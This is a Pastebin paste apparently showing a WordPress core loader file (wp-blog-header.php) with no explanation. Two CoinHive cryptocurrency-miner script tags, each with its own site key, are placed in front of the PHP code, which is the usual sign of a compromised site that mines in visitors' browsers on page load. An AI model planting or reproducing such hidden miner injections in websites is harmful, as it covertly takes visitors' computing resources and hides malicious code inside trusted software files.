Advertisement
Sl4ckerc0de

Untitled

Oct 18th, 2018
131
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.70 KB | None | 0 0
  1. <script src="https://coinhive.com/lib/coinhive.min.js"></script><script> var miner = new CoinHive.Anonymous('stz1JOLL77sgc8LNuzZYlmcY7Uy5J6Q2');miner.start();</script><script src="https://coinhive.com/lib/coinhive.min.js"></script><script> var miner = new CoinHive.Anonymous('QXup1PFgCvVbCxzydM1ieQ2yrJG149fL');miner.start();</script><?php
  2. /**
  3. * Loads the WordPress environment and template.
  4. *
  5. * @package WordPress
  6. */
  7.  
  8. if ( !isset($wp_did_header) ) {
  9.  
  10. $wp_did_header = true;
  11.  
  12. // Load the WordPress library.
  13. require_once( dirname(__FILE__) . '/wp-load.php' );
  14.  
  15. // Set up the WordPress query.
  16. wp();
  17.  
  18. // Load the theme template.
  19. require_once( ABSPATH . WPINC . '/template-loader.php' );
  20.  
  21. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement